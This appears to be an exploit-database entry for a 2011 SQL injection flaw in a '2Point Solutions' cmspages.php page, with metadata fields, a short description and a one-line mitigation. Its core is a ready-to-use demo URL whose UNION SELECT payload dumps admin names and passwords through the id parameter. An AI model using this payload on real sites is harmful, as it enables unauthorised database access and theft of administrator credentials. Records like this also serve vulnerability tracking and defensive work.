vendor:
cmspages.php
by:
Newbie_Campuz
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: cmspages.php
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2011
2Point Solutions SQL Injection Vulnerability
2Point Solutions (cmspages.php) SQL Injection Vulnerability is a vulnerability that allows an attacker to inject malicious SQL code into a vulnerable web application. The malicious code can be used to access, modify, or delete data from the database. The vulnerable URL is http://[target]/cmspages.php?id=[SQL], where [SQL] is the malicious SQL code. Demo: http://www.site.com/cmspages.php?id=-43+union+select 1,2,group_concat(FName,0x3a,password),4+from+admin--
Mitigation:
Input validation and parameterized queries can be used to prevent SQL injection attacks.